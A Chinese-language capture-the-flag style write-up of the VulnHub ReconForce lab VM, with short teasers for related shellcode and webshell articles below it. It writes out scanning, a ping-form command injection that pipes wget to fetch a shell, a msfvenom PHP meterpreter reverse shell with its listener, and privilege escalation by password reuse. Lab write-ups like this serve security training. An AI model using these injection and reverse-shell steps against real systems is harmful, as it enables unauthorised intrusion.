<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之ReconForce的實踐

    VSole2022-01-03 17:25:24

    今天實踐的是ReconForce,

    用workstation導入成功,但是掃描不出來地址,換成virtualbox,

    sudo netdiscover -r 192.168.56.0/24,

    接著做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.107,

    發現ftp可匿名登錄,那就登錄一下看看,發現個可能是密碼的信息,

    訪問http頁面,里面有個TroubleShoot鏈接可點擊,

    點擊后需要用戶名密碼認證,嘗試admin/Security@hackNos,登錄成功,

    頁面中的ping scan應該是可以執行命令,

    在kali攻擊機上做一個webshell,

    sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 R > shell.php,

    在kali攻擊機上開啟http下載服務,python2 -m SimpleHTTPServer,

    在ping scan的輸入框中填入,并點擊提交,

    127.0.0.1|wget http://192.168.56.102:8000/shell.php,

    查詢一下shell.php文件是否上傳成功,127.0.0.1|ls,

    在kali攻擊機上開個meterpreter的反彈shell監聽,

    msfconsole

    use exploit/multi/handler

    set payload php/meterpreter/reverse_tcp

    set LHOST 192.168.56.102

    set LPORT 4444

    run

    訪問webshell,http://192.168.56.107/5ecure/shell.php,

    獲取到靶機的shell,不是root,需要提權,

    先轉成交互式shell,

    python -c 'import pty; pty.spawn("/bin/bash")',

    發現個recon賬戶,猜測密碼還是Security@hackNos,

    切換到recon,發現能再直接切到root,搞定,

    shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    研究人員在TorchServe中發現多個高分漏洞,影響數萬AI 服務器。
    通過從事件日志中寫入/讀取 shellcode 來實現持久化。
    shellcode loader的編寫
    2023-04-17 11:15:39
    改變加載方式指針執行#include?參數1:分配的內存的起始地址,如果為NULL則由系統決定。參數2:分配的內存大小,以字節為單位。參數3:分配的內存類型,MEM_COMMIT表示將分配的內存立即提交給物理內存,MEM_RESERVE表示保留內存但不提交。參數4:分配的內存保護屬性,PAGE_READWRITE可讀可寫,PAGE_EXECUTE_READ可執行可讀。結構體的指針,用于指定新線程的安全屬性,NULL表示默認安全屬性
    shellcode動態注入!
    2023-01-24 10:15:10
    聲明:本人堅決反對利用文章內容進行惡意攻擊行為,一切錯誤行為必將受到懲罰,綠色網絡需要靠我們共同維護,推薦大
    跟第一代WebShell管理工具“菜刀”相比,冰蝎的流量是加密的,特征更不明顯,能有效規避流量設備的檢測。
    shellcode編寫探究
    2022-06-09 15:34:57
    前言shellcode是不依賴環境,放到任何地方都可以執行的機器碼。shellcode的應用場景很多,本文不研究shellcode的具體應用,而只是研究編寫一個shellcode需要掌握哪些知識。要使用字符串,需要使用字符數組。所以我們需要用到 LoadLibrary 和 GetProcAddress 這兩個函數,來動態獲取系統API的函數指針。
    OneEDR 2.5版本讓惡意Webshell“現原形”
    今天腦子里面蹦出來個想法,免殺木馬然后cs上線,本來想讓cs與msf聯動的,但是出了點小問題,還是先研究免殺火絨吧。
    shell編程15例(三)
    2022-03-25 07:43:19
    1、統計當前 Linux 系統中可以登錄計算機的賬戶有多少個 #!/bin/bash # 統計當前 Linux 系統中可以登錄計算機的賬戶有多少個 #方法 1: grep "bash$" /etc/passwd | wc -l #方法 2: awk -f: '/bash$/{x++}end{print x}' /etc/passwd
    shell編程15例(一)
    2022-03-23 07:53:04
    1、編寫hello world腳本 #!/bin/bash # 編寫hello world腳本 echo "Hello World!" 2、通過位置變量創建 Linux 系統賬戶及密碼 #!/bin/bash # 通過位置變量創建 Linux 系統賬戶及密碼
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类